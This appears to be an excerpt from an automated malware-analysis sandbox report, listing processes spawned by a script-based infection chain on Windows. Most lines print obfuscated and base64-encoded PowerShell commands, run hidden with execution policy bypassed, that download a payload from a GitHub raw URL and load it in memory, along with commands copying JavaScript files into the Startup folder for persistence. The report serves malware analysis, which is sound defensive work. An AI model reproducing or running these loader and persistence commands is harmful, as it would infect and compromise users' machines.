{3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwblaccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::fromba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwblaccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::fromba Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
